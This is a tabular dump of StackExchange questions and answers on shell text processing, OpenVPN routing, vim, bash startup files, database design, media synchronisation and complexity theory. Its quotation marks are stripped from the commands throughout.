_unix.214684 | A continuation of this question: parse first column of command output, get corresponding second column valueSay I have a command that outputs a string formatted as a table, as shown below.What if the pattern I am looking for includes spaces? For example, if the table is:First Characteristic: bSecond Characteristic: 89.4Version: 58.93Name of Device: myDeviceName of Device Load: myDevice-load-123abcWhat if I want to get the value next to Name of Device Load in the table above?To clarify, I know the value I am looking for is next to Name of Device Load. I do not know that it is in the 5th row of the output, and I do not know anything about what that value would look like (So I can't try pattern matching with something like -load-, for example). | How to parse table for pattern if pattern includes spaces | shell script;text processing | What about this :cat your_file.txt | grep Name of Device Load: | cut -d : -f 2 | tr -d This only keeps the line you are interested in, seperates it into two fields (works only if : is only present once per line), then remove spaces. |
_webapps.29197 | I'd like to contact a developer on Github to see how I can help out, etc. Any way to do this? I don't see the option anywhere. | Any way to contact a user on Github? | github | You can contact a GitHub user by going to her/his user page (https://github.com/[USERNAME]) and on the left-hand site you should see her/his email address (if they have provided one). |
_unix.342056 | First of all, sorry for the really long post. I have 2 routers home. Router 1 is on the first floor and router 2 is on the second floor. Router 2 is connected to Router 1 through an ethernet cable and uses DD-WRT firmware. Router 2 is acting as a switch (wireless Access Point) not as a router. I have a Computer running OpenVPN and the OS is centOS 7. My problem is as follows:1- CentOS machine connected to Router 1: OpenVPN client is able to connect to the OpenVPN server and get access to the home network and client is connected to the internet, can browse the web, use apps that requires internet connection, etc. 2- CentOS machine connected to Router 2: OpenVPN client is able to connect to the OpenVPN server and get access to the home network (ping other computers in the network etc. ) but no internet connectivity, cannot browse the web, use any other app that requires an internet connection, etc.Below my server.conf, client.ovpn and firewall configuration.server.conf:# Which TCP/UDP port should OpenVPN listen on?# If you want to run multiple OpenVPN instances# on the same machine, use a different port# number for each one. You will need to# open up this port on your firewall. port 1194# TCP or UDP server? ;proto tcp proto udp# dev tun will create a routed IP tunnel,# dev tap will create an ethernet tunnel.# Use dev tap0 if you are ethernet bridging# and have precreated a tap0 virtual interface# and bridged it with your ethernet interface.# If you want to control access policies# over the VPN, you must create firewall# rules for the the TUN/TAP interface.# On non-Windows systems, you can give# an explicit unit number, such as tun0.# On Windows, use dev-node for this.# On most systems, the VPN will not function# unless you partially or fully disable# the firewall for the TUN/TAP interface. ;dev tap dev tun# SSL/TLS root certificate (ca), certificate# (cert), and private key (key). Each client# and the server must have their own cert and# key file. The server and all clients will# use the same ca file.## See the easy-rsa directory for a series# of scripts for generating RSA certificates# and private keys. Remember to use# a unique Common Name for the server# and each of the client certificates.## Any X509 key management system can be used.# OpenVPN can also use a PKCS #12 formatted key file# (see pkcs12 directive in man page). ca ca.crt cert server.crt key server.key # This file should be kept secret# Diffie hellman parameters.# Generate your own with:# openssl dhparam -out dh2048.pem 2048 dh dh2048.pem# Configure server mode and supply a VPN subnet# for OpenVPN to draw client addresses from.# The server will take 10.8.0.1 for itself,# the rest will be made available to clients.# Each client will be able to reach the server# on 10.8.0.1. Comment this line out if you are# ethernet bridging. See the man page for more info. server 10.8.0.0 255.255.255.0# Maintain a record of client <-> virtual IP address# associations in this file. If OpenVPN goes down or# is restarted, reconnecting clients can be assigned# the same virtual IP address from the pool that was# previously assigned. ifconfig-pool-persist ipp.txt# If enabled, this directive will configure# all clients to redirect their default# network gateway through the VPN, causing# all IP traffic such as web browsing and# and DNS lookups to go through the VPN# (The OpenVPN server machine may need to NAT# or bridge the TUN/TAP interface to the internet# in order for this to work properly). push redirect-gateway def1 bypass-dhcp# Certain Windows-specific network settings# can be pushed to clients, such as DNS# or WINS server addresses. CAVEAT:# http://openvpn.net/faq.html#dhcpcaveats# The addresses below refer to the public# DNS servers provided by opendns.com. push dhcp-option DNS 8.8.8.8 push dhcp-option DNS 8.8.4.4# The keepalive directive causes ping-like# messages to be sent back and forth over# the link so that each side knows when# the other side has gone down.# Ping every 10 seconds, assume that remote# peer is down if no ping received during# a 120 second time period. keepalive 30 120# Enable compression on the VPN link.# If you enable it here, you must also# enable it in the client config file. comp-lzo# The maximum number of concurrently connected# clients we want to allow. ;max-clients 100# It's a good idea to reduce the OpenVPN# daemon's privileges after initialization.## You can uncomment this out on# non-Windows systems. user nobody group nobody# The persist options will try to avoid# accessing certain resources on restart# that may no longer be accessible because# of the privilege downgrade. persist-key persist-tun# Output a short status file showing# current connections, truncated# and rewritten every minute. status openvpn-status.log# By default, log messages will go to the syslog (or# on Windows, if running as a service, they will go to# the \Program Files\OpenVPN\log directory).# Use log or log-append to override this default.# log will truncate the log file on OpenVPN startup,# while log-append will append to it. Use one# or the other (but not both). log openvpn.log ;log-append openvpn.log# Set the appropriate level of log# file verbosity. verb 3Client.ovpn:client_1 remote <IP> ca ca.crt cert client_1.crt key client_1.key proto udp port 1194 dev tun resolv-retry infinite nobind persist-key persist-tun comp-lzoFirewall configuration:firewall-cmd --permanent --add-service openvpn firewall-cmd --permanent --zone=trusted --add-interface=tun0 firewall-cmd --permanent --zone=trusted --add-masquerade firewall-cmd --permanent --direct --passthrough ipv4 -t nat -A POSTROUTING -s 10.8.0.0/24 -o $DEV -j MASQUERADENotes: I tried 2 clients, client 1 was using Fedora 25 and client 2 was IOS 10 (OpenVPN app), both client had the same results and worked when centOS machine with openVPN was connected to router 1 and loss connectivity to the internet when centOS machine with openVPN was connected to router 2.Router 2 is using 192.168.1.1 (router 1 IP) as default gateway. | OpenVPN configuration problem | centos;networking;openvpn;router | null |
_softwareengineering.350615 | I am working in a Peruvian company that develops desktop accounting software(.net C#).We have many clients (companies) each customer can create several companies, in addition there is a new database for each year of each company.Example:DBCOMPANY1_2045658512_2015--------------------------DBCOMPANY1_2045658512_2016DBCOMPANY1_2045658512_2017DBCOMPANY1_2008004100_2016--------------------------DBCOMPANY1_2008004100_2017The software we want to implement in web so that it can be commercialized with access to several companies, hundreds or thousands of monthly records, electronic billing.Existing client databases use store procedures but it is uncomfortable to update the triggers, store procedures on all existing databases.If it is advisable to use stored procedures as would the update of these for all databases? If it is ORM how would it affect system performance? | Stored procedures or ORM in web? | c#;sql;orm;web;stored procedures | null |
_vi.10063 | What I usually do from bash/vim ... isopen file with vimgo to line to commentcomment a linesave and quitMy file is /usr/local/etc/php/7.0/conf.d/ext-xdebug.ini and the initial content is[xdebug]zend_extension=/usr/local/opt/php70-xdebug/xdebug.soI want to run a command that in one statement adds ; at the beginning of the second line.[xdebug]zend_extension=/usr/local/opt/php70-xdebug/xdebug.soIs it possible to do this directly from bash? | How to comment a line directly from bash using vim? | comments;invocation;bash | You can use:vim +'normal! 2GI;' +'x' path/to/your/fileThe + parameter allows to execute a command after opening the buffer.The first command normal! 2GI; goes to line 2 and add a ; at the beginning of the lineThe second command saves and exit.Bonus point: To uncomment the same line:vim +'normal! 2G^x' +'x' path/to/your/file |
_softwareengineering.269910 | Imagine I have two distinct OS processes (the actual OS is unimportant). Process A is responsible for playing a video file. Process B is responsible for playing the audio that accompanies the video file. Both processes are clients, connected via a local area network to a server.Assuming that the video and audio streams are synchronized at the file level, what mechanisms would I use to ensure that both processes coordinate with the server to absolutely ensure that once instructed they begin and continue playing in sync?This feels like a common problem but I am struggling to find any detailed, practical solutions. | What's the best way to synchronise an event over multiple processes? | synchronization | According to EBU Recommendation R37:The relative timing of the sound and vision components of a television signal states that end-to-end audio/video sync should be within +40ms and -60ms (audio before / after video, respectively) and that each stage should be within +5ms and -15ms.This quote is the summary from the Audio to video synchronization wikipedia page.This suggests that you need timing accuracy measured in 10's of milliseconds.Karl Bielefeldt's suggestion of Precision Time Protocol was a good one, but seems like overkill to me. PTP has a sub microsecond accuracy (on a local LAN), so is 3 orders of magnitude (more than 1000 times) more accurate than we need and consequently much more difficult to implement.The much older and more widely available Network Time Protocol (NTP) should result in clocks being synchronised to within a millisecond on a LAN, which is an order of magnitude (more than 10 times) more accurate than we require. Even if your server and clients were on the Internet, you should be able to get clocks synchronisied to 10's of ms if you don't have problems with asymmetric routes and network congestion.NTP client/server software is standard on most operating systems, all you need to do is sync both clients to the same server. Note that even if both clients are individually synced to the server with an accuracy of plus/minus 1ms, with respect to each other they are only synchronsed to plus/minus 2ms (one could be 1ms ahead of the server while the other is 1ms behind), but this is still well within the threshold of perception.Once your system times are synchronised, clients would fill their initial buffer and inform the server of the earliest time they could guarantee starting to serve that content. Once the server had received both times, it would send the worst case time back to both clients and they would both be expected to start at that time.Finally, since clocks can drift over time, your clients and server would have to keep synchronising clocks, and if the video drifts too far from the audio, you should duplicate or skip frames of video to maintain synchronisation. This should only be needed if you are running very long streams though.Incidentally, the reason for adjusting the video rather than the audio is that we are far less likely to notice a 1 frame dup/skip in video (assuming 20fps or higher) than even a 1/60th of a second audio glitch. |
_cstheory.1611 | For a given graph $G$, the Separator Problem asks whether a vertex or edge set of small cardinality (or weight) exists whose removal partitions $G$ into two disjoint graphs of approximately equal sizes. This is called the Vertex Separator Problem when the removed set is a vertex set, and the Edge Separator Problem when it is an edge set. Both problems are NP-complete for general unweighted graphs. What is the best known hardness of approximating vertex separator ? Is a PTAS ruled out ? What are the best known hardness results in the directed setting ?Correction : The following links and answers did not help me because I did not state my question correctly. My question is related to the following theorem of Leighton-Rao :Theorem : There exists a polynomial time algorithm that, given a graph $G(V,E)$ and a set $W \subseteq V$, finds a $\frac{2}{3}$ vertex separator $S \subseteq V$ of $W$ in $G$ of size $O(w.{\log}n)$, where $w$ is the minimum size of a $\frac{1}{2}$-vertex separator of $W$ in $G$.Given a graph $G(V,E)$ and a set $W \subseteq V$, I want to find a $\delta$-vertex separator (where $\frac{1}{2} \leq \delta \leq 1$ is a constant) of size $w$, where $w$ is the minimum size of a $\frac{1}{2}$-vertex separator of $W$ in $G$. What is the best known hardness of this problem ? The above theorem gives an $O({\log}n)$ approximation for this problem.Note that I am allowing constant factor blow-up in the size of the resulting components after removing the separator, but I want to minimize the size of the separator itself. The links mentioned in the comments point to minimum b-vertex separator, in which we insist that the size of the resulting components is at most $|V|/2$. | Hardness of Vertex Separators | cc.complexity theory;approximation hardness | null |
_cs.67537 | This question stems from this question and this answer. I also want to preface this question by stating that this question is done from the perspective of a RAM (or PRAM if it's more accurate term) model. From the comments in the answer, it seems like when doing algorithm analysis for the solution:$O(n)$ solution (guaranteed): sum up the elements of the first array. Then, sum up the elements of the second array. Finally, perform the substraction.for the problem of:finding the number that is different between two arrays (I'm assuming a fixed size structure, if it matters) of unsorted numbers (paraphrased by me)that it isn't as black and white as just coming to the conclusion as $2n$ (1 pass for each array), because you have to take into account the size of the number too. That is the part I am confused about. I've asked one of the commenters to elaborate a bit more for me: My idea is that while the time to add two numbers is proportional to their length, but there are $O(\log n)$ extra bits that the partial sums have over the longest input. Now, there are two things that complicate things. First, the inputs need not have the same length, but we'd like complexity in terms of their total length. If your addition is proportional to the longer number, you might rack up $O(n^2)$ quite easily. The solution is to add in place, which means the addition is proportional to the addend length - if not for carry. Now you just need to find how many carries you can have.Despite this pretty detailed comment, I'm still having difficulty understanding why it's different. (I suspect the reason is due to my ignorance of the lower level ongoings of a computer and numerical representations). Not wanting to test their patience, I googled it and asked here, but unable to properly articulate the question, the most I found was this answer, which seems to echo the quote above (I think), thus didn't help me further.Is it possible to simplify the explanation by perhaps illustrating it or elaborating further? Or is this as simple as it can get (and I just need to get the prerequisite knowledge)? | How does size of a number in an array affect time complexity algorithm analysis? | algorithms;algorithm analysis;runtime analysis;search algorithms;computation models | Runtime analysis as it is done in practice is not terribly rigorous. This is why you can have different answers that are equally correct, they just differ in their assumptions.To do a formally correct runtime analysis you first have to define a machine model. Almost nobody does this explicitly, usually some variant of the RAM is used. Then you write your algorithm using only operations your machine supports. This is not typically done either, usually some form of pseudo-code is used and the mapping to the machine instructions is assumed to be obvious. Only after doing these steps you can start counting how many instructions you use to solve an instance.In the question you linked, the proposed algorithm summed a list of $n$ numbers. In a casual runtime analysis one typically assumes that adding two numbers takes constant time. This is true for the RAM, but it's not true in the more realistic Word-RAM model. In the Word-RAM (and in real computers), you can only operate on $k$ bits at once. If the numbers you want to add are too big to fit in $k$ bits you need more than one operation. This is the same if you add numbers by hand: For small numbers (say with only 1 digit) you know the result by heart, for large numbers you have to manually add each digit and take care of the carry and so on.So if you run with the assumption that additions take constant time, summing a list of numbers takes linear time. If you want to be more precise, the length of the list alone is not sufficient to determine the runtime. You need to know how many bits your numbers have and a more reasonable $n$ for your runtime bound is the number of bits you need to encode your list. You should also think about the exact algorithm you use for adding two numbers and the order in which you add the numbers of your list, as this can have an influence on the runtime.If you want to see examples of very rigorous runtime analysis, I recommend Knuth's TAOCP. He defines his own machine and writes his algorithms using only simple machine instructions. |
_unix.154395 | I cannot copy a file over scp when the remote machine .bashrc file includes source command to update paths and some variables. Why does it happen? | Running scp when .bashrc of remote machine includes source command | scp | You should make part or all of your .bashrc not run when your shell is non-interactive. (An scp is an example of a non-interactive shell invocation, unless someone has radically altered your systems.) Then put all commands that can possibly generate output in that section of the file.A standard way to do this in an init file is:# Put all the commands here that should run regardless of whether# this is an interactive or non-interactive shell.# Example command:umask 0027# test if the prompt var is not setif [ -z $PS1 ]; then # prompt var is not set, so this is *not* an interactive shell exitfi# If we reach this line of code, then the prompt var is set, so# this is an interactive shell.# Put all the commands here that should run only if this is an# interactive shell.# Example command:echo Welcome, ${USER}. This is the ~/.bashrc file.You might also see people use[ -z $PS1 ] && exitinstead of my more verbose if statement.If you don't want to rearrange your whole file, you can also just make certain lines run only in interactive context by wrapping them like so:if [ -n $PS1 ]; then echo This line only runs in interactive mode.fiIf you segregate your .bashrc this way, then your scp commands should no longer have this problem. |
_softwareengineering.310752 | I need to develop a solution for a problem that requires multiple HTTP/ Socks proxies for different HTTP requests.The solution needs to be cross platform.Here is my idea how it needs to work: createThread(Proxy proxy) ---- Thread Code setupProxy(proxy); Do(){ HTTP_Request_List.add(GenerateHTTPRequest()) x10 While(true){ for(i=0;i<HTTP_Request_List.size();++i){ Send_Request(i) } sleep(5000) } }Since each 5 seconds the HTTP request will need to be replayed using the same proxy, I'm forced to use a thread solution where I keep a proxy unique to that thread?Could this achieved with node.js or a single thread solution with a better performance? | Best way to handle multiple proxies and HTTP requests | performance;http request | null |
_unix.119866 | I want to search for (+1) in a string (which is a GDG dataset name to confirm if it is a GDG) and want to get a binary answer if it has (+1) as part of the string or not. Can some one please help? | How to search '(+1)' character substring in a string | linux;shell script;grep | null |
_unix.78801 | So here I have a simple function that I wish to debug. However, I am unable to debug the desired function even with set -o functrace enabled. Before resorting to asking this question, I had managed to find a possible solution that did not produce the desired results, which is located here.How can I get bash debug my functions?#!/bin/bashecho Hello Worldhello() { echo Hello world}output:user@mac11:53:29~/desktop bash -x debug.sh + echo 'Hello World'Hello Worlduser@mac11:54:55~/desktop | Debugging bash functions | bash;shell | but that answer in the link does seem to work ........ Kaizen ~/so_test $ cat zhello.sh set -x ; set -o functrace hello() { name=$1; echo Hello , how are you $name; } hello itin ;output is : Kaizen ~/so_test $ ./zhello.sh + ./zhello.sh -- script was run ++ set -o functrace ++ hello itin -- function was invoked ++ name=itin -- variable assigned within the function hello ++ echo 'Hello , how are you itin' Hello , how are you itin -- printed the output from the function ...I am a bit curious , is there something specific you looking for ? |
_unix.259394 | I'm running Vagrant and VirutalBox and wants to use a host only network. I use the following configuration:config.vm.network private_network, ip: 33.33.33.33However my host doesn't get an IP address (33.33.33.1). Vagrant won't tell me this, I had to run ip addr to figure this out. Note that NFS won't work by this. | VirtualBox/Vagrant host only network host doesn't get IP address | virtualbox;opensuse;vagrant | I found out how to solve this. It is just a stupid error. VirtualBox use the network utility ifconfig which is deprecated for many distributions. I had net-tools installed which will install ifconfig but it looks like not all sub commands are support with this.The solution is to install net-tools-deprecated. https://software.opensuse.org/package/net-tools-deprecated |
_softwareengineering.283703 | As a developer I am used to keep my Python tools updated. Especially packages needed for installing and bundling. Using the most recent releases of pip, virtualenv and setuptools is in my personal experience the most reliable choice.I have been told recently that from an operations perspective, I should not touch the preinstalled releases of pip on the production machine. So to speak: The typical pip install -U pip in the virtualenv was a security risk.There are valid concerns I think, but I do wonder whether this really is the best practice for running services developped with Python. Pip as it is in Debian 7 for example is quite old.So my questionsWhat are the best practices here for running Python services securely?Are there ways to move the split worlds (OS Package Tree and Python Package Tree) closer together? | Python packages from an operations perspective | python;devops;operations | null |
_webmaster.85062 | According to this Google help document, we can create a sitemap telling Google that we have more than one language. But this requires indicating each URL with different languages every time. That means if you have one URL and three languages, you need to specify a <url> element with a <loc> tag and multiple <xhtml:link> subelements. If you have twenty URLs and fifteen languages, you would then need ten <url> elements with 20*15^2 <xhtml:link> subelements. That equates to 4500 <xhtml:link> in the same sitemap.xml file, which is a lot!For Example:<?xml version=1.0 encoding=UTF-8?><urlset xmlns=http://www.sitemaps.org/schemas/sitemap/0.9 xmlns:xhtml=http://www.w3.org/1999/xhtml> <url> <loc>http://www.example.com/english/</loc> <xhtml:link rel=alternate hreflang=de href=http://www.example.com/deutsch/ /> <xhtml:link rel=alternate hreflang=de-ch href=http://www.example.com/schweiz-deutsch/ /> <xhtml:link rel=alternate hreflang=en href=http://www.example.com/english/ /> </url> <url> <loc>http://www.example.com/deutsch/</loc> <xhtml:link rel=alternate hreflang=en href=http://www.example.com/english/ /> <xhtml:link rel=alternate hreflang=de-ch href=http://www.example.com/schweiz-deutsch/ /> <xhtml:link rel=alternate hreflang=de href=http://www.example.com/deutsch/ /> </url> <url> <loc>http://www.example.com/schweiz-deutsch/</loc> <xhtml:link rel=alternate hreflang=de href=http://www.example.com/deutsch/ /> <xhtml:link rel=alternate hreflang=en href=http://www.example.com/english/ /><xhtml:link rel=alternate hreflang=de-ch href=http://www.example.com/schweiz-deutsch/ /> </url></urlset>Is there a better practice for this? | Is there a more efficient way to specify multiple languages for Google in a sitemap? | google;sitemap;multilingual | I'd like to increase compatibility of my sitemaps to as many search engines as possible. For this reason, I'd like to only insert my URLs between <loc> and </loc> only. For example:<loc>http://www.example.com/english/</loc><loc>http://www.example.com/french/</loc><loc>http://www.example.com/german/</loc>Also, I'd define the language when each URL is accessed in the following ways:Using the content-language HTTP header. For example: Content-Language: daadding the lang attribute to the HTML tag. For example: <html lang=da>There is also an accept language header that tells you what languages the client (including google) accepts when scanning your page if the client specifies any. That way you won't have google index pages in languages it does not support.Here's more info on the HTTP headers:https://en.wikipedia.org/wiki/List_of_HTTP_header_fieldsHere's more info on the attributes that can be applied to the HTML tag:http://www.w3schools.com/tags/ref_language_codes.asp |
_unix.7899 | Installing something in windows takes a click of a button. But every time I try to install something in linux, which is not found in APT, I get so confused. You download a zipped folder, then what? If you are lucky there is a README, refering to some documentation, which might help you, if you are lucky. What is the magic trick when installing extensions and applications which aren't found in APT? I love linux, but this problem haunts me every day. | How do I know where to put things in linux? | software installation;directory structure | If it is a software which obeys the Filesystem Hierarchy Standard than you should place it in /usr/local and the appropriate subdirectories (like bin, lib, share, ...).Other software should be placed in their own directory under /opt. Then either set your PATH variable to include the bin directory or whatever directory which holds the executables, or create symbolic links to /usr/local/bin. |
_cs.70247 | The Ethernet MAC address FF:FF:FF:FF:FF:FF is reserved for broadcasts. If all frames are naturally broadcast in a LAN, what is the need for a broadcast address? | If all frames are naturally broadcast in a LAN, what is the need for a broadcast address? | computer networks | null |
_unix.38836 | I noticed in my local webserver logs that the IPv6 address of my desktop changed after upgrading to Kubuntu 12.04.inet6 addr: identical:identical:identical:identical:changed:changed:changed:changed/64 Scope:GlobalWhy did this happen, how can I avoid .htaccess rules from breaking during OS upgrades? | IPv6 address changed after upgrade. Why? and how can I harden my .htaccess against this? | apache httpd;ipv6;htaccess | It depends on how your address was configured in the first place. You can configure a static address if you don't want it to change. If you use DHCPv6 then it depends a lot on the DHCP server. If you use plain SLAAC (stateless autoconf) then it should remain stable as long as your MAC address of your network adapter is stable, and it you use SLAAC with privacy extensions than it is not stable by design. |
_unix.363761 | I'm looking to automate a process whereby a part of the filename is what is used to replace a value inside the file itself.Currently I use a manual process that looks like this:get the orgname manually$ grep -o orgname......... *2017-04* |uniq...uname=123456&**orgname=ABC5678**&userType=PERSISTENT&userLoginName=someusername&eventType=FAILED_LOGIN_ATTEMPT&timeOfOccurrence=2017-03-12%2016%3A49%3A36Then replace orgname with new name$ sed -i 's/ABC1234/5678/g' `*`5678`*` ; sed -i 's/DEF2345/6789/g' `*`6789`*`; sed -i etc...The final result would look like this:uname=123456&orgname=**1234**&userType=PERSISTENT&userLoginName=someusername&eventType=FAILED_LOGIN_ATTEMPT&timeOfOccurrence=2017-03-12%2016%3A49%3A36The files are named like this:rsa.collect.rsa-IB_L**1234**-2017-03-12.log.web1.decryptWhatever is after orgname= needs to change from ABC5678 to whatever comes after Lxxxx, only in files with the same xxxx in its filename.I'm having a hard time getting my head around how to extract that number from the file name and using it in a sed. There are hundreds of files (each with their own date) and 6 different number pairs to work with. I'm hoping to write a bash script that does this all at once.I was trying to use grep -P combined with putting that into some sort of variable and using sed but maybe there is a better/easier way?Let me know if there are any additional questions. | How to extract part of a string from a filename and sed it into that file | shell script;sed;grep;regular expression;string | Once the filename is in a variable, you can use a shell parameter expansion operator to extract part of it. Then substitute that into the sed command. Below I use the substring operator to get 4 characters starting from position 20.for file in rsa.collect.rsa-IB_L*.log.web1.decrypt; do orgname=${file:20:4} sed -i s/orgname=[^&]*/orgname=$orgname/ $filedone |
_unix.123867 | I used locate binary many time to search something on my 1TB HDD.Most of the time, I got many result and I have to read each line to get what exactly I'm looking for.It would be great if the locate can output the matched pattern with color ( just like grep --color)Is there any way to do so for locate command ? | locate with color | locate | The easiest way is to write a simple shell script which combines locate and grep:Create a file somewhere in your $PATH (e.g. /usr/local/bin/clocate) with #!/bin/shlocate --regex $1 | grep --color=auto $1then make it executable, e.g.chmod +x /usr/local/bin/clocateand use it like locate. The script does only accept one pattern.Another way is to use a shell function: If you are using bash as your shell, you can add to your $HOME/.bashrc the following line:clocate() { locate --regex $1 | grep --color=auto $1; }You need to rerun bash or re-source your .bashrc before you can the new command. Please note the --regex option for locate. You need to write .* instead of * to match any number of characters. |
_webapps.99495 | I have a list of (unique) numbers which I want to drag on another column but have it repeat each an X number of times.Column A: current data;Column B: desired output for X=2;--------------------------------------------------| | A | B |--------------------------------------------------| 1 | Number | Repeat number twice |--------------------------------------------------| 2 | 123 | 123 |--------------------------------------------------| 3 | 231 | 123 |--------------------------------------------------| 4 | 444 | 231 |--------------------------------------------------| 5 | 312 | 231 |--------------------------------------------------| 6 | 543 | 444 |--------------------------------------------------I want a way of dragging down starting at B2 all the way down to B:1000 and repeat each number in column A an X amount of times. | Repeat X times when dragging down | google spreadsheets | It's possible with a rather simple formula. Enter this formula in the first cell you want to drag from, and then just drag down.=INDIRECT(A&(ROUNDUP(ROW(A1)/2)+ROW(A$2)-1))ExplanationINDIRECT() takes a string argument and returns a cell reference A& just tells us which column to look for values inROUNDUP(ROW(A1)/2) is what gives is the repeating row numbersIt always starts on row 1, which gives us 1/2 rounded up = 1Next time 2/2 rounded up = also 1Then 3/2 rounded up = 24/2 = 2And so forthThe reason for using a cell reference is for the number to increase when dragging down.+ROW(A$2)-1 moves down to the specific row.In this case we move down 1 row (2-1)In most cases this could be set to the cell above the first value (+ROW(A$1)), but it wouldn't work when the value is in the first rowModificationYou'd have to modify this if the cells aren't exactly as in your example. The string A refers to the column with the values that should be repeatedA2 refers to the cell in the first row in the column (row 1, in any column really, not the first row with a value)A$2 is the first cell with a valueIf, for example, your first value is in B12 you change it to:=INDIRECT(B&(ROUNDUP(ROW(B1)/2)+ROW(B$12)-1)) |
_unix.17677 | Whenever I try to transcode a movie or a large video file, my laptop always switches off abruptly some time after the transcoding has begun. I initially thought that this had something to do with my DVD drive but even when I tried converting videos from a hard drive, the problem remained. I've switched from Handbrake to VLC and still the problem remains.When I opened System Monitor when the converting was going on, the CPU usage is around 100%. Is this a hardware problem or is it something wrong with the software? | laptop running arch abruptly switches off when ripping video files | arch linux;video encoding | I would suggest that this is probably a hardware problem, most likely a CPU overheat issue. You might be able to prove this by running some other kind of stress test or checking your BIOS for what the warning and critical levels are and making sure their is an audible warning at a lower temp than the critical shut off level. |
_unix.124187 | Is it possible to configure OpenSSH (or any other standard sshd) to accept any key offered by a connecting client?EG ssh -i ~/arbitraryKey hostname grants a login shell while ssh hostanme doesn't.I ask because of a half remembered anecdote about a misconfigured server but I've had a look and I couldn't find anything that would actually let this happen without some form of deliberate hacking of the daemon. (Recompiling etc) | Accept any private key for authentication | openssh;sshd;key authentication | Configuring an SSH server to accept any password would be easy with PAM put pam_permit on the auth stack, and voil. The possibility of misconfiguring such an open system is inherent to the flexibility of PAM since it lets you chain as many tests as you want, the possibility of doing 0 tests is unavoidable (at least without introducing weird exceptions that wouldn't cover all cases).Key authentication doesn't go through PAM, and there's no configuration setting for accept any key. That would only be useful in extremely rare cases (for testing or honeypots), so it isn't worth providing it as an option (with the inherent risk of misconfiguration). |
_unix.78653 | I am looking for an operating system where the login screen asks for a username and password for an rdp login prompt. I want an administrator to also be able to login to change the i.p. address for the server that hosts the accounts. Any suggestions? | RDP only Operating System | login;remote desktop | null |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.